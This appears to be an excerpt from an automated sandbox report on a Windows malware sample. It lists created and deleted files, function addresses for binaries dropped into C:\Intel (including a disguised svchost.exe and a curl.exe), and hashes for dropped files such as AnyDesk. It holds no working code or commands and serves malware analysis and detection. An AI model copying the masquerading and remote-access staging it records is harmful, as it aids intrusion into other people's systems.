    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\321e64ecacb66619_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\153bba9a429a2c40_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2e08a9c6ec333021_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\39c763e560200cda_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\6dcb70bdb8fe40a3_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\7ed93a10144ac834_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\264b46d61d915def_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b7cd751a99c70c48_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\13e83bd1c1ab1541_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\8fdcb7992c9e741c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ff5222d57552b6c1_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b87cf2f2b0511c4c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\dd1d9f7425e5aefb_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\348aae4f13c8f553_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\8cce886514f2b2ec_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\217bbc87393d2e57_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\8bfc77f05f6a3cc5_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2a99e21c738e2a0b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\d6af3918ca46ca94_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\85f220494be669b7_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2bb582fd7577f97e_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\9f97c8dd99a7773d_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ed344a77138c223d_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\95fcbb4ef0998598_0
    Source: C:\Intel\dc.exeFile deleted: C:\Windows\Temp\autB0DC.tmp
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeCode function: 0_3_02200CE20_3_02200CE2
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeCode function: 0_3_022016790_3_02201679
    Source: C:\Intel\curl.exeCode function: 34_2_001DF69034_2_001DF690
    Source: C:\Intel\curl.exeCode function: 34_2_001DD9C034_2_001DD9C0
    Source: C:\Intel\curl.exeCode function: 34_2_001DFA4034_2_001DFA40
    Source: C:\Intel\curl.exeCode function: 34_2_002C9A9334_2_002C9A93
    Source: C:\Intel\curl.exeCode function: 34_2_0024403034_2_00244030
    Source: C:\Intel\curl.exeCode function: 34_2_0027C00034_2_0027C000
    Source: C:\Intel\curl.exeCode function: 34_2_0022E0A034_2_0022E0A0
    Source: C:\Intel\curl.exeCode function: 34_2_0023E0E034_2_0023E0E0
    Source: C:\Intel\curl.exeCode function: 34_2_0028C0C034_2_0028C0C0
    Source: C:\Intel\curl.exeCode function: 34_2_0027A17034_2_0027A170
    Source: C:\Intel\curl.exeCode function: 34_2_0028A17034_2_0028A170
    Source: C:\Intel\curl.exeCode function: 34_2_002361A034_2_002361A0
    Source: C:\Intel\curl.exeCode function: 34_2_002981A034_2_002981A0
    Source: C:\Intel\curl.exeCode function: 34_2_002AC1E034_2_002AC1E0
    Source: C:\Intel\curl.exeCode function: 34_2_002B01F034_2_002B01F0
    Source: C:\Intel\curl.exeCode function: 34_2_0027421034_2_00274210
    Source: C:\Intel\curl.exeCode function: 34_2_002C421434_2_002C4214
    Source: C:\Intel\curl.exeCode function: 34_2_0021625034_2_00216250
    Source: C:\Intel\curl.exeCode function: 34_2_0027C28034_2_0027C280
    Source: C:\Intel\curl.exeCode function: 34_2_002082E034_2_002082E0
    Source: C:\Intel\curl.exeCode function: 34_2_002902C034_2_002902C0
    Source: C:\Intel\curl.exeCode function: 34_2_0025236034_2_00252360
    Source: C:\Intel\curl.exeCode function: 34_2_002A837034_2_002A8370
    Source: C:\Intel\curl.exeCode function: 34_2_002803A034_2_002803A0
    Source: C:\Intel\curl.exeCode function: 34_2_002CA39A34_2_002CA39A
    Source: C:\Intel\curl.exeCode function: 34_2_0028A42034_2_0028A420
    Source: C:\Intel\curl.exeCode function: 34_2_0026A43034_2_0026A430
    Source: C:\Intel\curl.exeCode function: 34_2_0027E41034_2_0027E410
    Source: C:\Intel\curl.exeCode function: 34_2_002AA46034_2_002AA460
    Source: C:\Intel\curl.exeCode function: 34_2_002A444034_2_002A4440
    Source: C:\Intel\curl.exeCode function: 34_2_0027A49034_2_0027A490
    Source: C:\Intel\curl.exeCode function: 34_2_002AE4F034_2_002AE4F0
    Source: C:\Intel\curl.exeCode function: 34_2_002C24F034_2_002C24F0
    Source: C:\Intel\curl.exeCode function: 34_2_0028A52634_2_0028A526
    Source: C:\Intel\curl.exeCode function: 34_2_0028056034_2_00280560
    Source: C:\Intel\curl.exeCode function: 34_2_0028256034_2_00282560
    Source: C:\Intel\curl.exeCode function: 34_2_002DC54534_2_002DC545
    Source: C:\Intel\curl.exeCode function: 34_2_002965D034_2_002965D0
    Source: C:\Intel\curl.exeCode function: 34_2_0023665034_2_00236650
    Source: C:\Intel\curl.exeCode function: 34_2_0026A65034_2_0026A650
    Source: C:\Intel\curl.exeCode function: 34_2_002B86B034_2_002B86B0
    Source: C:\Intel\curl.exeCode function: 34_2_002D46DC34_2_002D46DC
    Source: C:\Intel\curl.exeCode function: 34_2_002A070034_2_002A0700
    Source: C:\Intel\curl.exeCode function: 34_2_0027A7A034_2_0027A7A0
    Source: C:\Intel\curl.exeCode function: 34_2_0025A7B034_2_0025A7B0
    Source: C:\Intel\curl.exeCode function: 34_2_0027C78034_2_0027C780
    Source: C:\Intel\curl.exeCode function: 34_2_001E881034_2_001E8810
    Source: C:\Intel\curl.exeCode function: 34_2_0020680034_2_00206800
    Source: C:\Intel\curl.exeCode function: 34_2_0027E85034_2_0027E850
    Source: C:\Intel\curl.exeCode function: 34_2_002908B034_2_002908B0
    Source: C:\Intel\curl.exeCode function: 34_2_002808F034_2_002808F0
    Source: C:\Intel\curl.exeCode function: 34_2_0024890034_2_00248900
    Source: C:\Intel\curl.exeCode function: 34_2_0027C97034_2_0027C970
    Source: C:\Intel\curl.exeCode function: 34_2_002AE97034_2_002AE970
    Source: C:\Intel\curl.exeCode function: 34_2_002969A034_2_002969A0
    Source: C:\Intel\curl.exeCode function: 34_2_002AE9E734_2_002AE9E7
    Source: C:\Intel\curl.exeCode function: 34_2_002DAA6A34_2_002DAA6A
    Source: C:\Intel\curl.exeCode function: 34_2_00274A7034_2_00274A70
    Source: C:\Intel\curl.exeCode function: 34_2_00274AA034_2_00274AA0
    Source: C:\Intel\curl.exeCode function: 34_2_00288AB034_2_00288AB0
    Source: C:\Intel\curl.exeCode function: 34_2_0027AA8034_2_0027AA80
    Source: C:\Intel\curl.exeCode function: 34_2_00274AD034_2_00274AD0
    Source: C:\Intel\curl.exeCode function: 34_2_00260B2034_2_00260B20
    Source: C:\Intel\curl.exeCode function: 34_2_002AAB3534_2_002AAB35
    Source: C:\Intel\curl.exeCode function: 34_2_00280B1034_2_00280B10
    Source: C:\Intel\curl.exeCode function: 34_2_00214BD034_2_00214BD0
    Source: C:\Intel\curl.exeCode function: 34_2_00248BD034_2_00248BD0
    Source: C:\Intel\curl.exeCode function: 34_2_0025CC7034_2_0025CC70
    Source: C:\Intel\curl.exeCode function: 34_2_0025AD2034_2_0025AD20
    Source: C:\Intel\curl.exeCode function: 34_2_002BCD1034_2_002BCD10
    Source: C:\Intel\curl.exeCode function: 34_2_00296D7034_2_00296D70
    Source: C:\Intel\curl.exeCode function: 34_2_0027AD5034_2_0027AD50
    Source: C:\Intel\curl.exeCode function: 34_2_002AAD9934_2_002AAD99
    Source: C:\Intel\curl.exeCode function: 34_2_002A6D9034_2_002A6D90
    Source: C:\Intel\curl.exeCode function: 34_2_002B6E5034_2_002B6E50
    Source: C:\Intel\curl.exeCode function: 34_2_0027EF7034_2_0027EF70
    Source: C:\Intel\curl.exeCode function: 34_2_00228F4034_2_00228F40
    Source: C:\Intel\curl.exeCode function: 34_2_0027CF5034_2_0027CF50
    Source: C:\Intel\curl.exeCode function: 34_2_00282FE034_2_00282FE0
    Source: C:\Intel\curl.exeCode function: 34_2_0027AFD034_2_0027AFD0
    Source: C:\Intel\curl.exeCode function: 34_2_002B300034_2_002B3000
    Source: C:\Intel\curl.exeCode function: 34_2_002BD08034_2_002BD080
    Source: C:\Intel\curl.exeCode function: 34_2_002790F034_2_002790F0
    Source: C:\Intel\curl.exeCode function: 34_2_002AD10034_2_002AD100
    Source: C:\Intel\curl.exeCode function: 34_2_002791B034_2_002791B0
    Source: C:\Intel\curl.exeCode function: 34_2_0027F1B034_2_0027F1B0
    Source: C:\Intel\curl.exeCode function: 34_2_002D119C34_2_002D119C
    Source: C:\Intel\curl.exeCode function: 34_2_002611F034_2_002611F0
    Source: C:\Intel\curl.exeCode function: 34_2_0023F22034_2_0023F220
    Source: C:\Intel\curl.exeCode function: 34_2_0029D26034_2_0029D260
    Source: C:\Intel\curl.exeCode function: 34_2_0029724034_2_00297240
    Source: C:\Intel\curl.exeCode function: 34_2_002B524034_2_002B5240
    Source: C:\Intel\curl.exeCode function: 34_2_002812E034_2_002812E0
    Source: C:\Intel\curl.exeCode function: 34_2_002572C034_2_002572C0
    Source: C:\Intel\curl.exeCode function: 34_2_0023B31034_2_0023B310
    Source: C:\Intel\curl.exeCode function: 34_2_0025135034_2_00251350
    Source: C:\Intel\curl.exeCode function: 34_2_0023B40034_2_0023B400
    Source: C:\Intel\curl.exeCode function: 34_2_0027B40034_2_0027B400
    Source: C:\Intel\curl.exeCode function: 34_2_0029740034_2_00297400
    Source: C:\Intel\curl.exeCode function: 34_2_002BB41034_2_002BB410
    Source: C:\Intel\curl.exeCode function: 34_2_002634B034_2_002634B0
    Source: C:\Intel\curl.exeCode function: 34_2_002874B034_2_002874B0
    Source: C:\Intel\curl.exeCode function: 34_2_002814B034_2_002814B0
    Source: C:\Intel\curl.exeCode function: 34_2_0026549034_2_00265490
    Source: C:\Intel\curl.exeCode function: 34_2_0029B49034_2_0029B490
    Source: C:\Intel\curl.exeCode function: 34_2_0027F4E034_2_0027F4E0
    Source: C:\Intel\curl.exeCode function: 34_2_002AF4E034_2_002AF4E0
    Source: C:\Intel\curl.exeCode function: 34_2_001F74D034_2_001F74D0
    Source: C:\Intel\curl.exeCode function: 34_2_002794C034_2_002794C0
    Source: C:\Intel\curl.exeCode function: 34_2_0029D4C034_2_0029D4C0
    Source: C:\Intel\curl.exeCode function: 34_2_0023553034_2_00235530
    Source: C:\Intel\curl.exeCode function: 34_2_002995B034_2_002995B0
    Source: C:\Intel\curl.exeCode function: 34_2_0024159034_2_00241590
    Source: C:\Intel\curl.exeCode function: 34_2_0027B66034_2_0027B660
    Source: C:\Intel\curl.exeCode function: 34_2_0029164034_2_00291640
    Source: C:\Intel\curl.exeCode function: 34_2_0027D6C034_2_0027D6C0
    Source: C:\Intel\curl.exeCode function: 34_2_0025B6D034_2_0025B6D0
    Source: C:\Intel\curl.exeCode function: 34_2_002D170E34_2_002D170E
    Source: C:\Intel\curl.exeCode function: 34_2_0027971034_2_00279710
    Source: C:\Intel\curl.exeCode function: 34_2_0027F76034_2_0027F760
    Source: C:\Intel\curl.exeCode function: 34_2_0024974034_2_00249740
    Source: C:\Intel\curl.exeCode function: 34_2_001D17A034_2_001D17A0
    Source: C:\Intel\curl.exeCode function: 34_2_002117F134_2_002117F1
    Source: C:\Intel\curl.exeCode function: 34_2_002117F034_2_002117F0
    Source: C:\Intel\curl.exeCode function: 34_2_0027380034_2_00273800
    Source: C:\Intel\curl.exeCode function: 34_2_0027F87034_2_0027F870
    Source: C:\Intel\curl.exeCode function: 34_2_0029787034_2_00297870
    Source: C:\Intel\curl.exeCode function: 34_2_0020D88034_2_0020D880
    Source: C:\Intel\curl.exeCode function: 34_2_002818E034_2_002818E0
    Source: C:\Intel\curl.exeCode function: 34_2_0027B8F034_2_0027B8F0
    Source: C:\Intel\curl.exeCode function: 34_2_0029D91034_2_0029D910
    Source: C:\Intel\curl.exeCode function: 34_2_0021195034_2_00211950
    Source: C:\Intel\curl.exeCode function: 34_2_0029195034_2_00291950
    Source: C:\Intel\curl.exeCode function: 34_2_0024998034_2_00249980
    Source: C:\Intel\curl.exeCode function: 34_2_0027F98034_2_0027F980
    Source: C:\Intel\curl.exeCode function: 34_2_002AD98034_2_002AD980
    Source: C:\Intel\curl.exeCode function: 34_2_002799E034_2_002799E0
    Source: C:\Intel\curl.exeCode function: 34_2_0027D9C034_2_0027D9C0
    Source: C:\Intel\curl.exeCode function: 34_2_002B39C034_2_002B39C0
    Source: C:\Intel\curl.exeCode function: 34_2_002A7A3034_2_002A7A30
    Source: C:\Intel\curl.exeCode function: 34_2_0027BB2034_2_0027BB20
    Source: C:\Intel\curl.exeCode function: 34_2_001EBBB034_2_001EBBB0
    Source: C:\Intel\curl.exeCode function: 34_2_00273B9034_2_00273B90
    Source: C:\Intel\curl.exeCode function: 34_2_00247BD034_2_00247BD0
    Source: C:\Intel\curl.exeCode function: 34_2_00279BD034_2_00279BD0
    Source: C:\Intel\curl.exeCode function: 34_2_002A5BD034_2_002A5BD0
    Source: C:\Intel\curl.exeCode function: 34_2_001E3C3034_2_001E3C30
    Source: C:\Intel\curl.exeCode function: 34_2_002D9C1734_2_002D9C17
    Source: C:\Intel\curl.exeCode function: 34_2_0028BC7034_2_0028BC70
    Source: C:\Intel\curl.exeCode function: 34_2_002B9C7034_2_002B9C70
    Source: C:\Intel\curl.exeCode function: 34_2_0026BCBC34_2_0026BCBC
    Source: C:\Intel\curl.exeCode function: 34_2_0027DC8034_2_0027DC80
    Source: C:\Intel\curl.exeCode function: 34_2_002D1C8034_2_002D1C80
    Source: C:\Intel\curl.exeCode function: 34_2_00221CC034_2_00221CC0
    Source: C:\Intel\curl.exeCode function: 34_2_00297CD034_2_00297CD0
    Source: C:\Intel\curl.exeCode function: 34_2_00283D5034_2_00283D50
    Source: C:\Intel\curl.exeCode function: 34_2_00293D5034_2_00293D50
    Source: C:\Intel\curl.exeCode function: 34_2_00281DB034_2_00281DB0
    Source: C:\Intel\curl.exeCode function: 34_2_0028FD8034_2_0028FD80
    Source: C:\Intel\curl.exeCode function: 34_2_002ABD9034_2_002ABD90
    Source: C:\Intel\curl.exeCode function: 34_2_001E7DC034_2_001E7DC0
    Source: C:\Intel\curl.exeCode function: 34_2_002AFE6034_2_002AFE60
    Source: C:\Intel\curl.exeCode function: 34_2_0026DEA034_2_0026DEA0
    Source: C:\Intel\curl.exeCode function: 34_2_0027FE8034_2_0027FE80
    Source: C:\Intel\curl.exeCode function: 34_2_00273E8034_2_00273E80
    Source: C:\Intel\curl.exeCode function: 34_2_002ADE8034_2_002ADE80
    Source: C:\Intel\curl.exeCode function: 34_2_00247F6034_2_00247F60
    Source: C:\Intel\curl.exeCode function: 34_2_00279F7034_2_00279F70
    Source: C:\Intel\curl.exeCode function: 34_2_0028FFC034_2_0028FFC0
    Source: C:\Intel\driver.exeCode function: 40_2_0040FCD040_2_0040FCD0
    Source: C:\Intel\driver.exeCode function: 40_2_0040A5C440_2_0040A5C4
    Source: C:\Intel\driver.exeCode function: 40_2_00409EDC40_2_00409EDC
    Source: C:\Intel\driver.exeCode function: 40_2_0043179240_2_00431792
    Source: C:\Intel\driver.exeCode function: 40_2_0040C82440_2_0040C824
    Source: C:\Intel\driver.exeCode function: 40_2_004150CC40_2_004150CC
    Source: C:\Intel\driver.exeCode function: 40_2_004210BE40_2_004210BE
    Source: C:\Intel\driver.exeCode function: 40_2_0041C94040_2_0041C940
    Source: C:\Intel\driver.exeCode function: 40_2_0040710C40_2_0040710C
    Source: C:\Intel\driver.exeCode function: 40_2_0042992340_2_00429923
    Source: C:\Intel\driver.exeCode function: 40_2_004029D040_2_004029D0
    Source: C:\Intel\driver.exeCode function: 40_2_004081E840_2_004081E8
    Source: C:\Intel\driver.exeCode function: 40_2_004231FF40_2_004231FF
    Source: C:\Intel\driver.exeCode function: 40_2_0040C9A440_2_0040C9A4
    Source: C:\Intel\driver.exeCode function: 40_2_00422A4040_2_00422A40
    Source: C:\Intel\driver.exeCode function: 40_2_0042C26040_2_0042C260
    Source: C:\Intel\driver.exeCode function: 40_2_0043227740_2_00432277
    Source: C:\Intel\driver.exeCode function: 40_2_0040DA3040_2_0040DA30
    Source: C:\Intel\driver.exeCode function: 40_2_004232C740_2_004232C7
    Source: C:\Intel\driver.exeCode function: 40_2_0041A28040_2_0041A280
    Source: C:\Intel\driver.exeCode function: 40_2_0042035840_2_00420358
    Source: C:\Intel\driver.exeCode function: 40_2_0041DB7440_2_0041DB74
    Source: C:\Intel\driver.exeCode function: 40_2_0040930C40_2_0040930C
    Source: C:\Intel\driver.exeCode function: 40_2_0043331040_2_00433310
    Source: C:\Intel\driver.exeCode function: 40_2_0043731C40_2_0043731C
    Source: C:\Intel\driver.exeCode function: 40_2_0043632C40_2_0043632C
    Source: C:\Intel\driver.exeCode function: 40_2_0040CB3C40_2_0040CB3C
    Source: C:\Intel\driver.exeCode function: 40_2_004173F540_2_004173F5
    Source: C:\Intel\driver.exeCode function: 40_2_004343FC40_2_004343FC
    Source: C:\Intel\driver.exeCode function: 40_2_00434B8440_2_00434B84
    Source: C:\Intel\driver.exeCode function: 40_2_004393A440_2_004393A4
    Source: C:\Intel\driver.exeCode function: 40_2_00427C4040_2_00427C40
    Source: C:\Intel\driver.exeCode function: 40_2_0040B41440_2_0040B414
    Source: C:\Intel\driver.exeCode function: 40_2_0043331040_2_00433310
    Source: C:\Intel\driver.exeCode function: 40_2_00417CD440_2_00417CD4
    Source: C:\Intel\driver.exeCode function: 40_2_0040CD4040_2_0040CD40
    Source: C:\Intel\driver.exeCode function: 40_2_00437D5040_2_00437D50
    Source: C:\Intel\driver.exeCode function: 40_2_0040E56440_2_0040E564
    Source: C:\Intel\driver.exeCode function: 40_2_0042856440_2_00428564
    Source: C:\Intel\driver.exeCode function: 40_2_004215E040_2_004215E0
    Source: C:\Intel\driver.exeCode function: 40_2_00437D5040_2_00437D50
    Source: C:\Intel\driver.exeCode function: 40_2_00413E6440_2_00413E64
    Source: C:\Intel\driver.exeCode function: 40_2_0043D60C40_2_0043D60C
    Source: C:\Intel\driver.exeCode function: 40_2_0042563440_2_00425634
    Source: C:\Intel\driver.exeCode function: 40_2_004096C040_2_004096C0
    Source: C:\Intel\driver.exeCode function: 40_2_00436ED040_2_00436ED0
    Source: C:\Intel\driver.exeCode function: 40_2_00428E8040_2_00428E80
    Source: C:\Intel\driver.exeCode function: 40_2_0041369040_2_00413690
    Source: C:\Intel\driver.exeCode function: 40_2_00429E9E40_2_00429E9E
    Source: C:\Intel\driver.exeCode function: 40_2_0042EEA040_2_0042EEA0
    Source: C:\Intel\driver.exeCode function: 40_2_00411F4C40_2_00411F4C
    Source: C:\Intel\driver.exeCode function: 40_2_00422F7740_2_00422F77
    Source: C:\Intel\driver.exeCode function: 40_2_0043777840_2_00437778
    Source: C:\Intel\driver.exeCode function: 40_2_00432F3E40_2_00432F3E
    Source: C:\Intel\driver.exeCode function: 40_2_004387F840_2_004387F8
    Source: C:\Intel\driver.exeCode function: 40_2_0040D78440_2_0040D784
    Source: C:\Intel\driver.exeCode function: 40_2_0041A78C40_2_0041A78C
    Source: C:\Intel\driver.exeCode function: 40_2_0040DFAC40_2_0040DFAC
    Source: C:\Intel\driver.exeCode function: 40_2_0040536840_2_00405368
    Source: C:\Intel\svchost.exeCode function: 42_2_03E3B32042_2_03E3B320
    Source: C:\Intel\svchost.exeCode function: 42_2_03E3B27B42_2_03E3B27B
    Source: C:\Intel\Trays\4t-min64.exeCode function: 43_2_0040A47F43_2_0040A47F
    Source: C:\Intel\svchost.exeCode function: 44_2_03E3B32044_2_03E3B320
    Source: C:\Intel\svchost.exeCode function: 44_2_03E3B27B44_2_03E3B27B
    Source: C:\Intel\svchost.exeCode function: 45_2_03E3B32045_2_03E3B320
    Source: C:\Intel\svchost.exeCode function: 45_2_03E3B27B45_2_03E3B27B
    Source: Joe Sandbox ViewDropped File: C:\Intel\AnyDesk\AnyDesk.exe 7F813D6552F20F2E761807E94C34EDCFE91570A9D637C82C955AE52768367046
    Source: Joe Sandbox ViewDropped File: C:\Intel\Trays\4t-min64.exe D7AF4E205E963B0C17330B7559CD7AA7BFABEE7E0F5F8A3F815CC2BB5F659201
    Source: Joe Sandbox ViewDropped File: C:\Intel\Trays\7z.dll 9532AC334F37954C8FA781489B52B113CDE746E8271D75516F419A3F13BAAD6B
    Source: C:\Intel\curl.exeCode function: String function: 00212230 appears 34 times
    Source: C:\Intel\curl.exeCode function: String function: 00212B50 appears 281 times
    Source: C:\Intel\curl.exeCode function: String function: 00213250 appears 42 times
    Source: C:\Intel\curl.exeCode function: String function: 001D3960 appears 387 times
    Source: C:\Intel\curl.exeCode function: String function: 00222C70 appears 119 times
    Source: C:\Intel\curl.exeCode function: String function: 001D3850 appears 233 times
    Source: C:\Intel\curl.exeCode function: String function: 001CE200 appears 51 times
    Source: C:\Intel\curl.exeCode function: String function: 00249F20 appears 47 times
    Source: C:\Intel\curl.exeCode function: String function: 0020C4D0 appears 41 times
    Source: C:\Intel\curl.exeCode function: String function: 001D43D0 appears 36 times
    Source: C:\Intel\curl.exeCode function: String function: 002C7EC0 appears 55 times
    Source: C:\Intel\curl.exeCode function: String function: 001CF6A0 appears 39 times
    Source: C:\Intel\curl.exeCode function: String function: 001CF8E0 appears 39 times
    Source: C:\Intel\curl.exeCode function: String function: 001C1A10 appears 39 times
    Source: C:\Intel\curl.exeCode function: String function: 001CF7A0 appears 33 times
    Source: C:\Intel\curl.exeCode function: String function: 00237DF0 appears 57 times
    Source: C:\Intel\curl.exeCode function: String function: 001D6930 appears 43 times
    Source: C:\Intel\curl.exeCode function: String function: 0022AD70 appears 71 times
    Source: C:\Intel\svchost.exeCode function: String function: 03E33CC8 appears 36 times
    Source: unins000.exe.40.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
    Source: unins000.exe.40.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
    Source: svchost.exe.36.drStatic PE information: No import functions for PE file found
